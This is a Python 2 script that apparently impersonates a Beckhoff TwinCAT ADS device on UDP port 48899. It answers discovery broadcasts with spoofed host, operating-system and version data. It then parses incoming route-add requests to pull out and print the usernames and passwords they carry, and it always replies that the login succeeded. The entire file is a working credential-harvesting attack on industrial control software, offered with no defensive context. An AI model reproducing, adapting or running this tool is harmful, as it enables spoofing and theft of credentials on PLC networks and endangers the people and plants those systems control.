import socket
import sys
import binascii
import random

operating_systems = [
 	# WIN_CE_60
	'040014011401000006'+('00'*3)+'00'+ ('00'*7)+'03'+('00' * (526/2)),	
	# WIN_7
	'04001401140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031' + ('00' * (458/2)),
	# WIN_8
	'04001401140100000600000002000000f023000002' + ('00' * (518/2))
]

def construct_discover_packet(host, netid, os_nr, ver):
	preamble = '03661471'
	msg_type = '0000000001000080' # discover response
	net_id 	 = ''

	for octet in netid.split('.'):
		net_id += "{0:0{1}X}".format(int(octet), 2)

	filler 	 = '1027040000000500'
	os 		 = operating_systems[os_nr]
	version  = '03000400'

	for v in ver.split('.'):
		if int(v) > 255:
			t = "{0:0{1}X}".format(int(v), 4)

			# Transform into Big endian
			version += t[2:4]+t[0:2]
		else:
			version += "{0:0{1}X}".format(int(v), 2)


	hostname = host.encode('hex') + '00'
	len_host = "{0:0{1}X}".format((len(hostname) / 2),2) + '00'

	packet = binascii.unhexlify(preamble + msg_type + net_id + filler + len_host + hostname + os + version)
	return packet

def construct_login_response(netid, ok):
	net_id 	 = ''
	cred_ok  = ''

	if ok == True:
		cred_ok = '0000'
	else:
		cred_ok = '0407'

	for octet in netid.split('.'):
		net_id += "{0:0{1}X}".format(int(octet), 2)

	packet = binascii.unhexlify('036614710000000006000080' + net_id + '10270100000001000400' + cred_ok + '0000')
	return packet

def dissect_route_data(data):
	x = 24

	netid 		= data[x:x+12]
	x+= 12 + 16

	len_route 	= int(data[x:x+2], 16)
	x+= 2 + 2

	route 		= data[x:(x+(len_route*2))]
	str_route 	= ''

	for c in [route[i:i+2] for i in range(0, len(route), 2)]:
		str_route += chr(int(c, 16))
	
	x+= (len_route*2) + 20

	encryption = (int(data[x:x+2], 16) == 15)
	x+= 4

	len_username = int(data[x:x+2], 16)
	x+= 4

	username = data[x:x+(len_username*2)]
	str_username = ''

	if encryption == False:
		for c in [username[i:i+2] for i in range(0, len(username), 2)]:
			str_username += chr(int(c, 16))
	else:
		str_username = username
	
	x+= (len_username*2) + 4

	len_password = int(data[x:x+2], 16)
	x+= 4

	password = data[x:x+(len_password*2)]
	str_password = ''

	if encryption == False:
		for c in [password[i:i+2] for i in range(0, len(password), 2)]:
			str_password += chr(int(c, 16))
	else:
		str_password = password

	return {'Net ID': netid, 'Route': str_route, 'Encryption': encryption, 'Username': str_username, 'Password': str_password}

def init():
	# Ask the user for some information about the spoofed server
	hostname 	= raw_input('Hostname:\t\t\t') 			# 'CX-0E26E6'
	blockMethod = raw_input('Block GetByHostname?\t\t')	# 'y'
	net_id 		= raw_input('AMS NetId:\t\t\t') 		#'5.14.38.230.1.1'
	os_nr 		= int(raw_input('Operating System (0/1/2):\t')) # 0
	ver 		= raw_input('TwinCAT Version (x.x.xxxx):\t') #'2.11.2245'

	if (blockMethod.lower() == "y"):
		hostname += chr(1)

	# Create a UDP socket
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

	# Bind the socket to the port
	server_address = ('', 48899)
	sock.bind(server_address)

	print >>sys.stderr, 'Starting up on %s port %s' % server_address

	while True:
	    print >>sys.stderr, '\nListening...'
	    data, address = sock.recvfrom(4096)

	    if data:
		    # Dissect the data
		    hex_data = binascii.hexlify(data)

		    # Check if this is a discovery packet (\x01) or a route packet (\x06)
		    msg_type = int(hex_data[17:18])
		    
		    if 		msg_type == 1:
		    	print '\n> Incoming broadcast from %s:%s...' % (address)

		    	new_data = construct_discover_packet(hostname, net_id, int(os_nr), ver)
		        sent = sock.sendto(new_data, address)
		    	
		    	print '\n>> Sent fake packet to %s to register host "%s" (%s) with TwinCAT %s...' \
		    			% (address, hostname, net_id, ver)

		    elif 	msg_type == 6:
		    	print '\n> Login request from %s:%s...' % (address)

		    	# Read credentials from the route packet
		    	info = dissect_route_data(binascii.hexlify(data))

		    	print "\n-------------- Login Info --------------\n"
		    	print info.items()
		    	print "\n----------------------------------------\n"

		    	# Respond
		    	new_data = construct_login_response(net_id, True)
		        sent = sock.sendto(new_data, address)



init()